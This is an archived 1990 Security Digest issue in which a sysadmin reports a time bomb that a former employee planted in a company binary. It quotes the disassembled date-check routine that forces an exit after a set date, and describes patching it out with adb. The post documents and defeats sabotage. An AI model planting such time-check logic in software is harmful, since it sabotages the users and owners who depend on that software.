The 'Security Digest' Archives (TM)

Archive: About | Browse | Search | Contributions | Feedback
Site: Help | Index | Search | Contact | Notices | Changes

ARCHIVE: Zardoz 'Security Digest' - Archives (1989 - 1991)
DOCUMENT: Zardoz 'Security Digest' V2 #3 1990-01-18 (1 file, 776 bytes)
NOTICE: recognises the rights of all third-party works.


Date: Thu, 18 Jan 90 17:15:37 PST
Subject: Security Digest V2 #3

Security Digest Volume 2 Issue 3


            time bombs do exist


Date: Sun, 14 Jan 90 13:01:12 PST
From: [email protected] (Bryan Costales)
Subject: time bombs do exist

Yes, time bombs in code do exist. The following fragment of code
was found in an important binary left by a former employee. The comments
are mine.

_cktime:    link    a6,#-8
            movl    #2427715C,d0   #  Wed Mar 22 02:11:40 1989 (in seconds)
            subl    _etime,d0      #  difference twixt now and then
            movl    d0,[email protected](-4.)
            divsl   #15180,d0      #  divide by 24hrs worth of seconds
            addl    #118,d0        #  add back 280 days
            movl    d0,[email protected](-8.)
            bgts    _cktime+46     #  normal run if positive
            jsr     _retm          #  exit if negative
_cktime+46  unlk    a6
            rts                    #  normal return
_etime             # set at runtime to today's date/time in seconds

We were not left with enough of the original source to regenerate a new
binary, but, by using adb, we patched the binary, changing the bgts
into a bras, thus disabling the exit. We are still sleuthing for backup
bombs, but have thus far found none.  I guess the moral here, is to run
something like the "file motel" and archive absolutely everything


        End of Security Digest Volume 2 Issue 3